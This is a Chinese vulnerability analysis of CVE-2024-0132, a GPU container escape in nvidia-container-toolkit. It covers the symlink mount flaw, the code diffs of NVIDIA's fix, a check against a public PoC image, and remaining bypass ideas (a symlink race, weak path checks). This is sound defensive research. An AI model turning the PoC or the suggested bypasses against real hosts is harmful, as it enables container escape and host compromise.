root@wanglei-gpu:~# docker run -tid ubuntu sleep 777770c6ac9b97277217e13fecbc8ac8754e569b83b33a871236493a10b5ad291ca3root@wanglei-gpu:~# ps -ef |grep 7777root 30697 30677 0 22:51 pts/0 00:00:00 sleep 7777root 30720 23331 0 22:51 pts/0 00:00:00 grep --color=auto 7777root@wanglei-gpu:~# nsenter -t 30697 -mroot@wanglei-gpu:/# ls -lahd proc/1dr-xr-xr-x 9 root root 0 Dec 12 14:51 proc/1root@wanglei-gpu:/# ls -lahd proc/selfls: cannot read symbolic link 'proc/self': No such file or directorylrwxrwxrwx 1 root root 0 Dec 12 14:51 proc/selfroot@wanglei-gpu:/# stat proc/self File: proc/selfstat: cannot read symbolic link 'proc/self': No such file or directory Size: 0 Blocks: 0 IO Block: 1024 symbolic linkDevice: 0,65 Inode: 4026531842 Links: 1Access: (0777/lrwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)Access: 2024-12-12 14:51:50.626149745 +0000Modify: 2024-12-12 14:51:50.538149127 +0000Change: 2024-12-12 14:51:50.538149127 +0000 Birth: -root@wanglei-gpu:/# stat proc/1 File: proc/1 Size: 0 Blocks: 0 IO Block: 1024 directoryDevice: 0,65 Inode: 224269 Links: 9Access: (0555/dr-xr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)Access: 2024-12-12 14:51:50.626149745 +0000Modify: 2024-12-12 14:51:50.626149745 +0000Change: 2024-12-12 14:51:50.626149745 +0000 Birth: -
但如果同时进入 pid namespace, 则可以访问 /proc/self
。而父进程 nsenter 对容器内不可见。
root@wanglei-gpu:~# nsenter -t 30697 -m -proot@wanglei-gpu:/# cat /proc/self/status Name: catUmask: 0022State: R (running)Tgid: 53015Ngid: 0Pid: 53015PPid: 52992...root@wanglei-gpu:/# cat /proc/52992/statusName: bashUmask: 0022State: S (sleeping)Tgid: 52992Ngid: 0Pid: 52992PPid: 0...
5. 为什么 CDI 模式不受漏洞影响
根据章节 “七、漏洞分析-2.6 nvidia-container-runtime-hook 调用 nvidia-container-cli”,cuda前向兼容特性在 nvidia-container-cli configure
命令中被调用。
如章节 “七、漏洞分析-2.4 nvidia-container-runtime 具体会对 spec 修改什么”所述, CDI模式不会调用nvidia-container-cli configure
。
因为所有的配置已经更新到 spec 中了, 配置来源于 /etc/cdi/nvidia.yaml
, 例如:
---cdiVersion:0.5.0containerEdits:deviceNodes:-path:/dev/nvidia-modeset-path:/dev/nvidia-uvm-path:/dev/nvidia-uvm-tools-path:/dev/nvidiactlenv:-NVIDIA_VISIBLE_DEVICES=voidhooks:-args: -nvidia-cdi-hook -create-symlinks ---link -libnvidia-allocator.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-allocator.so.1 ---link -../libnvidia-allocator.so.1::/usr/lib/x86_64-linux-gnu/gbm/nvidia-drm_gbm.so ---link -libnvidia-vulkan-producer.so.470.223.02::/usr/lib/x86_64-linux-gnu/libnvidia-vulkan-producer.so ---link -libglxserver_nvidia.so.470.223.02::/usr/lib/xorg/modules/extensions/libglxserver_nvidia.so hookName:createContainer path:/usr/bin/nvidia-cdi-hook-args: -nvidia-cdi-hook -update-ldcache ---folder -/usr/lib/x86_64-linux-gnu hookName:createContainer path:/usr/bin/nvidia-cdi-hookmounts:-containerPath:/run/nvidia-persistenced/socket hostPath:/run/nvidia-persistenced/socket options: -ro -nosuid -nodev -bind -noexec...-containerPath:/usr/bin/nvidia-persistenced hostPath:/usr/bin/nvidia-persistenced options: -ro -nosuid -nodev -bind-containerPath:/usr/bin/nvidia-smi hostPath:/usr/bin/nvidia-smi options: -ro -nosuid -nodev -bind...devices:-containerEdits: deviceNodes: -path:/dev/nvidia0 -path:/dev/dri/card1 -path:/dev/dri/renderD128 hooks: -args: -nvidia-cdi-hook -create-symlinks ---link -../card1::/dev/dri/by-path/pci-0000:00:0d.0-card ---link -../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render hookName:createContainer path:/usr/bin/nvidia-cdi-hook ...name:"0"-containerEdits: deviceNodes: -path:/dev/nvidia0 -path:/dev/dri/card1 -path:/dev/dri/renderD128 hooks: -args: -nvidia-cdi-hook -create-symlinks ---link -../card1::/dev/dri/by-path/pci-0000:00:0d.0-card ---link -../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render hookName:createContainer path:/usr/bin/nvidia-cdi-hook ...name:GPU-86fd03a3-2937-0c87-3dff-26be693ec102-containerEdits: deviceNodes: -path:/dev/nvidia0 -path:/dev/dri/card1 -path:/dev/dri/renderD128 hooks: -args: -nvidia-cdi-hook -create-symlinks ---link -../card1::/dev/dri/by-path/pci-0000:00:0d.0-card ---link -../renderD128::/dev/dri/by-path/pci-0000:00:0d.0-render hookName:createContainer path:/usr/bin/nvidia-cdi-hook ...name:allkind:nvidia.com/gpu
八、漏洞引入分析
commit#35a9f27(https://github.com/NVIDIA/libnvidia-container/commit/35a9f27c0200d74fdccc43f893253439d1b969a5#diff-082d73ee31e0c92eac8fe9324cd6dca676357264ec3d36f934ba718dae93f6d1)
主要是功能实现,没有考虑到:
1. 从容器mount文件到容器是一个敏感操作
- 未对软链接作限制(如果不熟悉容器安全,开发者可能很难想到)
九、漏洞修复分析
1. 修复分析
PR#282
1.1 增加函数 mount_in_root
添加了 mount_in_root
函数,如果目的路径在rootfs以外,则返回错误。
https://github.com/NVIDIA/libnvidia-container/commit/ad1f8c8ac4a31bef69c82958f3a87456ceaa39c8?diff=unified#diff-ad502ebe98b15d295b76f88ec8ff917a249b05151a3191db41e43f0390c70b2dR69-R77
src/nvc_mount.c
+static char *mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags);+// mount_in_root bind mounts the specified src to the specified location in a root.+// If the destination resolves outside of the root an error is raised.+static char *+mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags) {+ char dst[PATH_MAX];+ if (path_resolve_full(err, dst, rootfs, path) < 0)+ return (NULL);+ return mount_with_flags(err, src, dst, uid, gid, mountflags);+}
intpath_resolve_full(struct error *err, char *buf, const char *root, const char *path){ return (do_path_resolve(err, true, buf, root, path));}static intdo_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path){ int fd = -1; int rv = -1; char realpath[PATH_MAX]; char dbuf[2][PATH_MAX]; char *link = dbuf[0]; char *ptr = dbuf[1]; char *file, *p; unsignedint noents = 0; unsignedint nlinks = 0; ssize_t n; *ptr = '\0'; *realpath = '\0'; assert(*root == '/'); if ((fd = open_next(err, -1, root)) < 0) goto fail; if (path_append(err, ptr, path) < 0) goto fail; while ((file = strsep(&ptr, "/")) != NULL) { if (*file == '\0' || str_equal(file, ".")) continue; elseif (str_equal(file, "..")) { /* * Remove the last component from the resolved path. If we are not below * non-existent components, restore the previous file descriptor as well. */ if ((p = strrchr(realpath, '/')) == NULL) { error_setx(err, "path error: %s resolves outside of %s", path, root); goto fail; } *p = '\0'; if (noents > 0) --noents; else { if ((fd = open_next(err, fd, "..")) < 0) goto fail; } } else { if (noents > 0) goto missing_ent; n = readlinkat(fd, file, link, PATH_MAX); if (n > 0 && n < PATH_MAX && nlinks < MAXSYMLINKS) { /* * Component is a symlink, append the rest of the path to it and * proceed with the resulting buffer. If it is absolute, also clear * the resolved path and reset our file descriptor to root. */ link[n] = '\0'; if (*link == '/') { ++link; *realpath = '\0'; if ((fd = open_next(err, fd, root)) < 0) goto fail; } if (ptr != NULL) { if (path_append(err, link, ptr) < 0) goto fail; } ptr = link; link = dbuf[++nlinks % 2]; } else { if (n >= PATH_MAX) errno = ENAMETOOLONG; elseif (nlinks >= MAXSYMLINKS) errno = ELOOP; switch (errno) { missing_ent: case ENOENT: /* Component doesn't exist */ ++noents; if (path_append(err, realpath, file) < 0) goto fail; break; case EINVAL: /* Not a symlink, proceed normally */ if ((fd = open_next(err, fd, file)) < 0) goto fail; if (path_append(err, realpath, file) < 0) goto fail; break; default: error_set(err, "path error: %s/%s", root, path); goto fail; } } } } if (!full) { if (path_new(err, buf, realpath) < 0) goto fail; } else { if (path_join(err, buf, root, realpath) < 0) goto fail; } rv = 0; fail: xclose(fd); return (rv);}
1.2 替换 mount_with_flags 为 mount_in_root
src/nvc_mount.c
static char *mount_directory(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir){ char src[PATH_MAX];- char dst[PATH_MAX]; if (path_join(err, src, root, dir) < 0) return (NULL);- if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0)- return (NULL);- return mount_with_flags(err, src, dst, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);+ return mount_in_root(err, src, cnt->cfg.rootfs, dir, cnt->uid, cnt->gid, MS_NOSUID|MS_NOEXEC);}// mount_firmware mounts the specified firmware file. The path specified is the container path and is resolved// on the host before mounting.static char *mount_firmware(struct error *err, const char *root, const struct nvc_container *cnt, const char *container_path){ char src[PATH_MAX];- char dst[PATH_MAX]; if (path_resolve_full(err, src, root, container_path) < 0) return (NULL);- if (path_join(err, dst, cnt->cfg.rootfs, container_path) < 0)- return (NULL);+ return mount_in_root(err, src, cnt->cfg.rootfs, container_path, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID);}
1.3 添加函数 file_mode_nofollow
相较于 file_mode, file_mode_nofollow 将 stat 替换为了 lstat,以避免解析软链接。
src/utils.h
+int file_mode_nofollow(struct error *, const char *, mode_t *);
src/utils.c
+// file_mode_nofollow implements the same functionality as file_mode except that+// in that case of a symlink, the file is not followed and the mode of the+// original file is returned.+int+file_mode_nofollow(struct error *err, const char *path, mode_t *mode)+{+ struct stat s;+ if (xlstat(err, path, &s) < 0)+ return (-1);+ *mode = s.st_mode;+ return (0);+}
src/xfuncs.h
+static inline int xlstat(struct error *, const char *, struct stat *);...+static inline int+xlstat(struct error *err, const char *path, struct stat *buf)+{+ int rv;+ if ((rv = lstat(path, buf)) < 0)+ error_set(err, "lstat failed: %s", path);+ return (rv);+}
1.4 替换 file_mode 为 file_mode_nofollow
static char **mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size){ char src[PATH_MAX]; char dst[PATH_MAX]; mode_t mode; char *src_end, *dst_end, *file; char **mnt, **ptr; if (path_new(err, src, root) < 0) return (NULL); if (path_resolve_full(err, dst, cnt->cfg.rootfs, dir) < 0) return (NULL); if (file_create(err, dst, NULL, cnt->uid, cnt->gid, MODE_DIR(0755)) < 0) return (NULL);+ if (path_new(err, dst, dir) < 0)+ return (NULL); src_end = src + strlen(src); dst_end = dst + strlen(dst); mnt = ptr = array_new(err, size + 1); /* NULL terminated. */ if (mnt == NULL) return (NULL); for (size_t i = 0; i < size; ++i) { file = basename(paths[i]); if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags)) continue; if (path_append(err, src, paths[i]) < 0) goto fail;- if (path_append(err, dst, file) < 0)- goto fail;- if (file_mode(err, src, &mode) < 0)+ if (file_mode_nofollow(err, src, &mode) < 0) goto fail;- if (file_create(err, dst, NULL, cnt->uid, cnt->gid, mode) < 0)+ // If we encounter resolved directories or symlinks here, we raise an error.+ if (S_ISDIR(mode) || S_ISLNK(mode)) {+ error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]); goto fail;- log_infof("mounting %s at %s", src, dst);- if (xmount(err, src, dst, NULL, MS_BIND, NULL) < 0)- goto fail;- if (xmount(err, NULL, dst, NULL, MS_BIND|MS_REMOUNT | MS_RDONLY|MS_NODEV|MS_NOSUID, NULL) < 0)+ }+ if (path_append(err, dst, file) < 0) goto fail;- if ((*ptr++ = xstrdup(err, dst)) == NULL)+ if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL) goto fail; *src_end = '\0'; *dst_end = '\0'; } return (mnt); fail: for (size_t i = 0; i < size; ++i) unmount(mnt[i]); array_free(mnt, size); return (NULL);}
src/utils.c
intfile_create(struct error *err, const char *path, const char *data, uid_t uid, gid_t gid, mode_t mode){ char *p; uid_t euid; gid_t egid; mode_t perm; int fd; size_t size; int flags = O_NOFOLLOW|O_CREAT; int rv = -1; // We check whether the file already exists with the required mode and skip the creation.- if (data == NULL && file_mode(err, path, &perm) == 0) {+ if (data == NULL && file_mode_nofollow(err, path, &perm) == 0) { if (perm == mode) {- log_errf("The path %s already exists with the required mode; skipping create", path);+ log_warnf("The path %s already exists with the required mode; skipping create", path); return (0); } } if ((p = xstrdup(err, path)) == NULL) return (-1); /* * Change the filesystem UID/GID before creating the file to support user namespaces. * This is required since Linux 4.8 because the inode needs to be created with a UID/GID known to the VFS. */ euid = geteuid(); egid = getegid(); if (set_fsugid(uid, gid) < 0) goto fail; perm = (0777 & ~get_umask()) | S_IWUSR | S_IXUSR; if (make_ancestors(dirname(p), perm) < 0) goto fail; perm = 0777 & ~get_umask() & mode; if (S_ISDIR(mode)) { if (mkdir(path, perm) < 0 && errno != EEXIST) goto fail; } else if (S_ISLNK(mode)) { if (data == NULL) { errno = EINVAL; goto fail; } if (symlink(data, path) < 0 && errno != EEXIST) goto fail; } else { if (data != NULL) { size = strlen(data); flags |= O_WRONLY|O_TRUNC; } if ((fd = open(path, flags, perm)) < 0) { if (errno == ELOOP) errno = EEXIST; /* XXX Better error message if the file exists and is a symlink. */ goto fail; } if (data != NULL && write(fd, data, size) < (ssize_t)size) { close(fd); goto fail; } close(fd); } rv = 0; fail: if (rv < 0) error_set(err, "file creation failed: %s", path); assert_func(set_fsugid(euid, egid)); free(p); return (rv);}
2. 修复效果验证
2.1 复现环境
环境同 ”六、漏洞复现-1. nvidia-container-toolkit-1.1 复现环境“ 。
安装 docker, nvidia-container-toolkit
root@wanglei-gpu:~# apt update && apt install docker.io -yroot@wanglei-gpu:~# curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg \ && curl -s -L https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list | \ sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#g' | \ tee /etc/apt/sources.list.d/nvidia-container-toolkit.listroot@wanglei-gpu:~# apt-get update && \ apt-get install -y libnvidia-container1=1.16.2-1 \ libnvidia-container-tools=1.16.2-1 \ nvidia-container-toolkit-base=1.16.2-1 \ nvidia-container-toolkit=1.16.2-1
配置容器运行时 nvidia
root@wanglei-gpu:~# nvidia-ctk runtime configure --runtime=dockerINFO[0000] Config file does not exist; using empty config INFO[0000] Wrote updated config to /etc/docker/daemon.json INFO[0000] It is recommended that docker daemon be restarted. root@wanglei-gpu:~# systemctl restart docker
环境信息如下
root@wanglei-gpu:~# nvidia-container-cli --versioncli-version: 1.16.2lib-version: 1.16.2build date: 2024-09-24T20:48+00:00build revision: 921e2f3197385173cf8670342e96e98afe9b3dd3build compiler: x86_64-linux-gnu-gcc-7 7.5.0build platform: x86_64build flags: -D_GNU_SOURCE -D_FORTIFY_SOURCE=2 -DNDEBUG -std=gnu11 -O2 -g -fdata-sections -ffunction-sections -fplan9-extensions -fstack-protector -fno-strict-aliasing -fvisibility=hidden -Wall -Wextra -Wcast-align -Wpointer-arith -Wmissing-prototypes -Wnonnull -Wwrite-strings -Wlogical-op -Wformat=2 -Wmissing-format-attribute -Winit-self -Wshadow -Wstrict-prototypes -Wunreachable-code -Wconversion -Wsign-conversion -Wno-unknown-warning-option -Wno-format-extra-args -Wno-gnu-alignof-expression -Wl,-zrelro -Wl,-znow -Wl,-zdefs -Wl,--gc-sectionsroot@wanglei-gpu:~# root@wanglei-gpu:~# nvidia-container-cli infoNVRM version: 470.223.02CUDA version: 11.4Device Index: 0Device Minor: 0Model: Tesla T4Brand: NvidiaGPU UUID: GPU-86fd03a3-2937-0c87-3dff-26be693ec102Bus Location: 00000000:00:0d.0Architecture: 7.5root@wanglei-gpu:~# root@wanglei-gpu:~# docker infoClient: Version: 24.0.7 Context: default Debug Mode: falseServer: Containers: 0 Running: 0 Paused: 0 Stopped: 0 Images: 0 Server Version: 24.0.7 Storage Driver: overlay2 Backing Filesystem: extfs Supports d_type: true Using metacopy: false Native Overlay Diff: true userxattr: false Logging Driver: json-file Cgroup Driver: systemd Cgroup Version: 2 Plugins: Volume: local Network: bridge host ipvlan macvlan null overlay Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog Swarm: inactive Runtimes: io.containerd.runc.v2 nvidia runc Default Runtime: runc Init Binary: docker-init containerd version: runc version: init version: Security Options: apparmor seccomp Profile: builtin cgroupns Kernel Version: 5.15.0-76-generic Operating System: Ubuntu 22.04.2 LTS OSType: linux Architecture: x86_64 CPUs: 8 Total Memory: 31.15GiB Name: wanglei-gpu ID: 611fe373-3040-4a95-96bc-cff83017766f Docker Root Dir: /var/lib/docker Debug Mode: false Experimental: false Insecure Registries: 127.0.0.0/8 Live Restore Enabled: false
2.2 修复效果验证
使用预先构建的poc镜像 ssst0n3/poc-cve-2024-0132 或临时构建,同样的poc无法再利用。
root@wanglei-gpu:~# git clone https://github.com/ssst0n3/poc-cve-2024-0132.gitroot@wanglei-gpu:~# cd poc-cve-2024-0132/root@wanglei-gpu:~/poc-cve-2024-0132# docker build -t ssst0n3/poc-cve-2024-0132 .root@wanglei-gpu:~/poc-cve-2024-0132# docker run -ti --runtime=nvidia --gpus=all ssst0n3/poc-cve-2024-0132docker: Error response from daemon: failed to create task for container: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error running hook #0: error running hook: exit status 1, stdout: , stderr: Auto-detected mode as 'legacy'nvidia-container-cli: mount error: unexpected source file mode 120777 for /proc/1/cwd/usr/lib/libnvidia-ml.so.1: unknown.ERRO[0000] error waiting for container:
4. 当前修复局限性
4.1 file_mode_nofollow: 条件竞争
file_mode_nofollow 检查了软链接场景,但可以通过共享卷和软链接条件竞争绕过。
static char **mount_files(struct error *err, const char *root, const struct nvc_container *cnt, const char *dir, char *paths[], size_t size){ ...for (size_t i = 0; i < size; ++i) { file = basename(paths[i]); if (!match_binary_flags(file, cnt->flags) && !match_library_flags(file, cnt->flags)) continue; if (path_append(err, src, paths[i]) < 0) goto fail; if (file_mode_nofollow(err, src, &mode) < 0) goto fail; // If we encounter resolved directories or symlinks here, we raise an error. if (S_ISDIR(mode) || S_ISLNK(mode)) { error_setx(err, "unexpected source file mode %o for %s", mode, paths[i]); goto fail; } if (path_append(err, dst, file) < 0) goto fail; if ((*ptr++ = mount_in_root(err, src, cnt->cfg.rootfs, dst, cnt->uid, cnt->gid, MS_RDONLY|MS_NODEV|MS_NOSUID)) == NULL) goto fail; *src_end = '\0'; *dst_end = '\0'; } ...}
4.2 mount_in_root
mount_in_root 函数是,如果目的路径在rootfs以外则返回错误,但实际仅在路径中出现 ..
时才会触发, 在路径可以是软链接时似乎没什么防护效果。
// mount_in_root bind mounts the specified src to the specified location in a root.// If the destination resolves outside of the root an error is raised.static char *mount_in_root(struct error *err, const char *src, const char *rootfs, const char *path, uid_t uid, uid_t gid, unsigned long mountflags) { char dst[PATH_MAX]; if (path_resolve_full(err, dst, rootfs, path) < 0) return (NULL); return mount_with_flags(err, src, dst, uid, gid, mountflags);}
intpath_resolve_full(struct error *err, char *buf, const char *root, const char *path){ return (do_path_resolve(err, true, buf, root, path));}static intdo_path_resolve(struct error *err, bool full, char *buf, const char *root, const char *path){ ... while ((file = strsep(&ptr, "/")) != NULL) { if (*file == '\0' || str_equal(file, ".")) continue; elseif (str_equal(file, "..")) { /* * Remove the last component from the resolved path. If we are not below * non-existent components, restore the previous file descriptor as well. */ if ((p = strrchr(realpath, '/')) == NULL) { error_setx(err, "path error: %s resolves outside of %s", path, root); goto fail; } *p = '\0'; if (noents > 0) --noents; else { if ((fd = open_next(err, fd, "..")) < 0) goto fail; } } else { ... } } if (!full) { if (path_new(err, buf, realpath) < 0) goto fail; } else { if (path_join(err, buf, root, realpath) < 0) goto fail; } rv = 0; fail: xclose(fd); return (rv);}
5. 该修复有无引入新漏洞
未引入新漏洞。
十、漏洞挖掘方法与过程
1. 原作者的漏洞挖掘方法
推测作者的挖掘方法如下:
1. 拿到一个新的容器运行时,首先关注mount系统调用
-
通过代码审计发现 cuda 前向兼容特性,允许从容器路径挂载到容器路径,而容器路径容易被攻击者控制
-
尝试软链接攻击
2. 有无可能早于作者或业界发现
有可能:
1. 我在业界无公开细节的情况下,独立复现了漏洞,证明具备相应的能力
- 2024年初曾计划过nvidia-container-runtime的漏洞挖掘项目,但优先级不高,尚未实际开展漏洞挖掘工作
十一、同类问题挖掘方法
|
|
---|---|
|
|
|
|
|
|
|
|
十二、漏洞情报
1. 如何获知本漏洞情报
2024年9月30日,通过漏洞情报平台感知。
2. 有无可能早于业界感知漏洞
漏洞修复者elezar在2024年9月11日,由个人的公开仓库向主仓提交了PR
libnvidia-container#282
。
因此可以通过监控他的commit行为来提前感知漏洞。
十三、总结
Wiz 安全研究团队近期在重点研究 AI 安全, CVE-2024-0132 作为 GPU 容器逃逸的首个漏洞, 是 AI 基础设施安全的一个重要组成部分。
本漏洞原理简单,发现起来较为容器,但 nvidia-container-toolkit 作为第三方提供的容器组件,以往研究者关注度较少,近期 AI 热潮才引起关注。
在研究过程中,发现该组件整体代码质量不高、NVIDIA对该项目的投入精力较低。未来,该组件的更多风险还值得进一步研究。
附
时间线
-
2018-09-14: 开发者引入漏洞
-
2024-09-01: Wiz 向 NVIDIA PSIRT 报告漏洞
-
2024-09-03: NVIDIA 确认漏洞
-
2024-09-26: NVIDIA 发布修复版本
-
2024-09-30: 采集到漏洞情报,开展漏洞分析与应急
-
2024-10-14: Wiz暂未公开漏洞细节,我完成业界首个漏洞复现
-
2025-01-06: 本文完稿
-
2025-02-13: 我在微信公众号发布本文
参考链接
-
https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
-
https://nvidia.custhelp.com/app/answers/detail/a_id/5582
本文使用“漏洞研究: 漏洞分析与复现”(https://github.com/ssst0n3/security-research-specification)作为文档基线。